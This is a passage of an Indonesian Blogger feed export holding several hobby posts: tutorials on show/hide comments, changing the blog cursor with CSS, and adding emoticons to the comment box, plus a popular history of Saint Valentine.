&amp;nbsp;&amp;nbsp;&amp;nbsp; slideDownPanelSpeed = 600,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; slideUpPanelSpeed&amp;nbsp;&amp;nbsp; = 400;&lt;br /&gt;
//]]&amp;gt;&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script type=&#39;text/javascript&#39;&amp;gt;&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script src=&#39;http://evawangi.googlecode.com/files/slidekomentar.js&#39; type=&#39;text/javascript&#39;/&amp;gt; &lt;/blockquote&gt;
5.&amp;nbsp; Simpan Template.&lt;br /&gt;
&lt;br /&gt;
Sahabat dapat memodifikasi kembali tampilannya sesuai selera sahabat. 
Selamat mencoba dan semoga berhasil dan bermanfaat buat sahabat.
      &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/1247284091236171105/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-showhide-pada-komentar-blog.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1247284091236171105'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1247284091236171105'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-showhide-pada-komentar-blog.html' title='Cara membuat Show/Hide Pada Komentar Blog'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-6861338842140417850</id><published>2013-02-14T20:33:00.002-08:00</published><updated>2013-02-14T20:34:30.639-08:00</updated><title type='text'>Asal-usul Valentine</title><content type='html'>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;http://static.liputan6.com/201302/saint_valentine_130214.jpg&quot; class=&quot;decoded&quot; src=&quot;http://static.liputan6.com/201302/saint_valentine_130214.jpg&quot; height=&quot;353&quot; width=&quot;640&quot; /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Hari Valentine tidak akan dirayakan tanpa mengenang sosok yang 
satu ini. Dunia memujanya sebagai figur lambang keromantisan: Saint 
Valentine atau Santo Valentinus.&lt;br /&gt;
&lt;br /&gt;
Berdasarkan 
Ensiklopedi Katolik (Catholic Encyclopedia, 1908), nama Valentinus bisa 
merujuk tiga martir atau santo (orang suci) yang berbeda. Yakni seorang 
pastur di Roma, seorang uskup Interamna (modern Terni), dan seorang 
martir di sebuah provinsi Romawi Timur di Afrika.&lt;br /&gt;
&lt;br /&gt;
Seperti
 dikatakan Paus Gelasius II, sebenarnya tak ada yang diketahui mengenai 
martir-martir ini. Banyak legenda yang mengelilingi mereka sebenarnya 
diciptakan pada akhir Abad Pertengahan di Inggris dan Prancis, saat 
pesta perayaan pada 14 Februari diasosiasikan dengan cinta. Sentimen 
semacam ini tidak ada sama sekali di kitab Legenda Emas Jacobus de 
Voragine, yang disusun pada kurang lebih era 1260. dan merupakan buku 
yang paling banyak dibaca pada akhir Abad Pertengahan.&lt;br /&gt;
&lt;br /&gt;
Buku
 tersebut sangatlah lengkap dalam memberi informasi setiap santo dan 
santa untuk setiap hari pada tahun kalender gerejawi sebagai ilham 
homili setiap misa. Riwayat hidup St. Valentinus yang sangat singkat, 
tertulis bahwa ia menolak untuk menangkal Yesus Kristus di depan &quot;Kaisar
 Claudius&quot; pada 280. Sebelum kepalanya dipenggal, Valentinus 
mengembalikan penglihatan dan pendengaran sipir penjaranya.&lt;br /&gt;
&lt;br /&gt;
Belakangan
 Jacobus mereka-mereka etimologi nama &quot;Valentinus,&quot; sebagai &quot;sesuatu 
yang mengandung keberanian (Latin: valor)&quot;, namun tidak ada tanda-tanda 
hati dan pesan-pesan yang ditandatangani yang &quot;diberi oleh 
Valentine-mu,&quot; seperti kadangkala disugestikan dalam karya-karya modern 
kesucian sentimental.&lt;br /&gt;
&lt;br /&gt;
Sisa-sisa kerangka yang digali
 dari makam Santo Hyppolytus di Via Tibertinus dekat Roma, 
diidentifikasikan sebagai jenazah St. Valentinus. Jasad itu ditaruh 
dalam sebuah peti emas dan dikirim ke Gereja Whitefriar Street Carmelite
 Church di Dublin, Irlandia. Jenazah ini telah diberikan kepada mereka 
oleh Paus Gregorius XVI pada 1836.&lt;br /&gt;
&lt;br /&gt;
Banyak wisatawan 
sekarang yang berziarah ke gereja ini pada hari Valentine, saat peti 
emas tadi diarak-arak dalam sebuah prosesi khusyuk dan dibawa ke sebuah 
altar tinggi. Pada hari itu sebuah misa khusus diadakan dan 
dipersembahkan kepada para muda-mudi dan mereka yang sedang menjalin 
hubungan cinta.&lt;br /&gt;
&lt;br /&gt;
Hari raya ini dihapus dari kalender 
gerejawi sejak 1969 sebagai bagian dari sebuah usaha yang lebih luas 
untuk menghapus santo-santa yang asal-muasalnya bisa dipertanyakan dan 
hanya berbasis legenda saja. Namun pesta ini masih dirayakan pada 
paroki-paroki tertentu.&lt;br /&gt;
&lt;br /&gt;
Asal usul Saint Valentine, 
maupun berapa banyak Valentine ada, memang masih misteri. Satu pendapat 
mengatakan, Saint Valentine adalah seorang martir Romawi karena menolak 
untuk melepaskan iman Kristen. Namun cerita paling populer yaitu Saint 
Valentine adalah seorang pendeta kuil yang dipenjara karena menentang 
pada masa pemerintahan Kaisar Claudius II saat zaman Romawi Kuno.&lt;br /&gt;
&lt;br /&gt;
Kala
 itu sang kaisar menganggap tentara muda yang bujangan lebih tabah dan 
kuat di dalam medan peperangan ketimbang yang menikah. Kaisar lalu 
melarang para pemuda menikah. Tindakan Kaisar itu mendapatkan tentangan 
dari pendeta Saint Valentine yang secara diam-diam menikahkan banyak 
pemuda. Santo pun ditangkap dan dihukum gantung pada 14 Februari 269 
Masehi.(dari berbagai sumber/ASW)&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;&lt;span style=&quot;font-size: x-small;&quot;&gt;semoga bermanfaat dan ilmunya makin bertambah&lt;br /&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;captain-kid&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: magenta;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/asal-usul-valentine.html&quot;&gt;&lt;span style=&quot;color: magenta;&quot;&gt;------HAPPY VALENTINE------&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/6861338842140417850/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/asal-usul-valentine.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/6861338842140417850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/6861338842140417850'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/asal-usul-valentine.html' title='Asal-usul Valentine'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-21895003111300496</id><published>2013-02-03T03:31:00.001-08:00</published><updated>2013-02-05T23:44:17.905-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Mengganti Cursor</title><content type='html'>&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-mengganti-cursor.html&quot; target=&quot;_blank&quot;&gt;Cara Mengganti Cursor&amp;nbsp;&lt;/a&gt; -&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;Udah lama amat aku gak posting karena bingung pengen
posting apaan! Oke berhubung lagi ada waktu luang mending aku posting cara mengganti cursor.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;Oce, langsung aja cekidot&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: whit; background-position: initial initial; background-repeat: initial initial; margin: 7.5pt 0cm 15pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span style=&quot;color: red; font-size: medium;&quot;&gt;Panduan Cara Mudah Mengganti
Cursor Blog Blogger&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;1. Klik Tata Letak&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;
2. Klik Tambah Gadget / Add A Gadget&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background: whte; line-height: 14.25pt; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;
3. Pilih Gadget Html/JavaScript&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background: whie; line-height: 14.25pt; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;4. Masukkan kode widget jam yang sudah saya sertakan
di bawah&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;
5. Simpan (kamu juga bisa memindahkan letak
widget jam tersebut dengan cara menarik gadget tersebut)&lt;br /&gt;
&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: whit; background-position: initial initial; background-repeat: initial initial; margin: 7.5pt 0cm 15pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red; font-family: Times, &#39;Times New Roman&#39;, serif; font-size: medium;&quot;&gt;Kode Cursor Untuk
Blogger Yang Harus Di Pasang&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: whte; background-position: initial initial; background-repeat: initial initial; margin: 7.5pt 0cm 15pt;&quot;&gt;
&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;Silakan copy dan paste kode berikut:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;border: 1px solid rgb(199, 215, 219); line-height: 19px; margin: 20px 20px 20px 35px; overflow: auto; padding: 15px; text-align: -webkit-auto;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&amp;lt;style type=&quot;text/css&quot;&amp;gt;&lt;br /&gt;body{cursor: url(&quot;&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0bfa-XFoDzfUQytGjmM32isO_lAINhfS1Z0XVz9lMeOU1tbwl4ejDjQ21K9hZcj2CuiShh9Y_qEgQLiDNLgSo1VId-TTqt7lpJ13WM6c_QoGsU21CK6JsVUCZYtW6sigOCbFXVEltUDWA/s1600/jasablogsitus-web-id.gif&lt;/span&gt;&quot;), auto;}&lt;br /&gt;&amp;lt;/style&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: red; line-height: 19px; margin: 0px; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;span style=&quot;font-family: Times, Times New Roman, serif; font-size: medium;&quot;&gt;&lt;b&gt;Update!!!!!!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;color: red; line-height: 19px; margin: 0px; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;color: red; line-height: 19px; margin: 0px; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;color: red; line-height: 19px; margin: 0px; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;/div&gt;
&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;Agar c&lt;span style=&quot;font-size: medium;&quot;&gt;u&lt;/span&gt;rsornya berubah secara permanen walaupun diarahkan kelink silakan gunakan kode seperti ini:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;border: 1px solid rgb(199, 215, 219); line-height: 19px; margin: 20px 20px 20px 35px; overflow: auto; padding: 15px; text-align: -webkit-auto;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Times, Times New Roman, serif;&quot;&gt;&amp;lt;style type=&quot;text/css&quot;&amp;gt;&lt;br /&gt;body{cursor: url(&quot;&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0bfa-XFoDzfUQytGjmM32isO_lAINhfS1Z0XVz9lMeOU1tbwl4ejDjQ21K9hZcj2CuiShh9Y_qEgQLiDNLgSo1VId-TTqt7lpJ13WM6c_QoGsU21CK6JsVUCZYtW6sigOCbFXVEltUDWA/s1600/jasablogsitus-web-id.gif&lt;/span&gt;&quot;), auto;}&lt;br /&gt;body a:hover{cursor: url(&quot;&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0bfa-XFoDzfUQytGjmM32isO_lAINhfS1Z0XVz9lMeOU1tbwl4ejDjQ21K9hZcj2CuiShh9Y_qEgQLiDNLgSo1VId-TTqt7lpJ13WM6c_QoGsU21CK6JsVUCZYtW6sigOCbFXVEltUDWA/s1600/jasablogsitus-web-id.gif&lt;/span&gt;&quot;), auto;}&lt;br /&gt;&amp;lt;/style&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;Catatan :&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;Silakan rubah tulisan yang saya beri warna&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;Merah&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;&amp;nbsp;dengan url gambar cursor yang kamu suka.&lt;/span&gt;&lt;br style=&quot;line-height: 19px; text-align: -webkit-auto;&quot; /&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;Jika kamu menggunakan semua kode yang saya tuliskan di sini (tanpa mengganti bagian yang saya beri warna&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;Merah&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;) maka cursornya terlihat seperti ini&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;Selamat mencoba, dan semoga ini bisa mempermudah anda dalam mengganti cursor blog bloggernya.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: 19px; text-align: -webkit-auto;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/21895003111300496/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-mengganti-cursor.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/21895003111300496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/21895003111300496'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-mengganti-cursor.html' title='Cara Mengganti Cursor'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-401160905386440337</id><published>2013-01-27T06:32:00.001-08:00</published><updated>2013-02-23T23:15:36.174-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Memasang Emoticon Di Kotak Komentar</title><content type='html'>Tutorial kali ini akan membahas postingan yang berjudul Cara Membuat / 
Memasang Emoticon Pada Kotak Komentar Blog. Bukankah unik jika emoticon 
menghiasi kotak komentar blog sobat?? Apalagi Emoticon ini bisa bergerak
 seperti emoticon kaskus. Berikut Screenshotnya&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga-gfNePlvFQTpQ79DSg1FpT746O4yWrsPhlGmxCHRlg6xobV5F_QlGbCYGfjiaDNVzP-P8VtTU4ybX9vJdu8QemO7iJghhAZ_8GgxT9O9t1e6aGgbJL6OKWt6ZBChtKz_2UoXKo2iSzg/s1600/emoticon.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga-gfNePlvFQTpQ79DSg1FpT746O4yWrsPhlGmxCHRlg6xobV5F_QlGbCYGfjiaDNVzP-P8VtTU4ybX9vJdu8QemO7iJghhAZ_8GgxT9O9t1e6aGgbJL6OKWt6ZBChtKz_2UoXKo2iSzg/s400/emoticon.JPG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Unyu-unyu ya? &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Lo
 tertarik bro untuk memasang di blog Lo Bro ?? Maka, silahkan di bacalah
 bro caranya, Terdapat 2 Bentuk Emoticon bro sebagai berikut :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;color: red; font-size: x-small;&quot;&gt;&lt;b&gt;1. EMOTICON PERTAMA&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
1. Masuk ke &lt;a href=&quot;http://www.blogger.com/home&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Dasboard&lt;/b&gt;&lt;/a&gt; lalu klik Blog sobat&lt;br /&gt;
2. Pilih ke &lt;b&gt;Template&lt;/b&gt;&lt;br /&gt;
3. Lalu pilih &lt;b&gt;Edit HTML &lt;/b&gt;dan pilih lanjutkan&lt;br /&gt;
4. Centang &lt;input id=&quot;expand-widget&quot; kind=&quot;click&quot; type=&quot;checkbox&quot; /&gt;  Expand Template Widget&lt;br /&gt;
5. Cari kode berikut&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;(Gunakan CTRL+F atau F3 Untuk mempercepat pencarian)&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
6. Letakan kode berikut tepat&lt;b&gt; diatas&lt;/b&gt; kode yang tadi&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt; &amp;lt;script src=&#39;http://tutorialblogger.googlecode.com/files/smiley.js&#39; type=&#39;text/javascript&#39;/&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
7. Setelah itu cari kode berikut&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;b:include data=&#39;post&#39; name=&#39;comment-form&#39;/&amp;gt; &lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;(Gunakan CTRL+F atau F3 Untuk mempercepat pencarian)&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
8. Jika sudah ketemu letakan kode dibawah ini tepat &lt;b&gt;diatas&lt;/b&gt; kode yang tadi&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;b&amp;gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/21.gif&#39;/&amp;gt;&lt;br /&gt;:))&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/100.gif&#39;/&amp;gt;&lt;br /&gt;:)]&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/71.gif&#39;/&amp;gt;&lt;br /&gt;;))&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/5.gif&#39;/&amp;gt;&lt;br /&gt;;;)&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif&#39;/&amp;gt;&lt;br /&gt;:D&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/3.gif&#39;/&amp;gt;&lt;br /&gt;;)&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/10.gif&#39;/&amp;gt;&lt;br /&gt;:p&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/20.gif&#39;/&amp;gt;&lt;br /&gt;:((&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/1.gif&#39;/&amp;gt;&lt;br /&gt;:)&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/2.gif&#39;/&amp;gt;&lt;br /&gt;:(&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/8.gif&#39;/&amp;gt;&lt;br /&gt;:X&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/12.gif&#39;/&amp;gt;&lt;br /&gt;=((&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/13.gif&#39;/&amp;gt;&lt;br /&gt;:-o&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/7.gif&#39;/&amp;gt;&lt;br /&gt;:-/&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/11.gif&#39;/&amp;gt;&lt;br /&gt;:-*&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/22.gif&#39;/&amp;gt;&lt;br /&gt;:|&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/35.gif&#39;/&amp;gt;&lt;br /&gt;8-}&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/102.gif&#39;/&amp;gt;&lt;br /&gt;~x(&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/104.gif&#39;/&amp;gt;&lt;br /&gt;:-t&lt;br /&gt;&amp;lt;img border=&#39;0&#39; 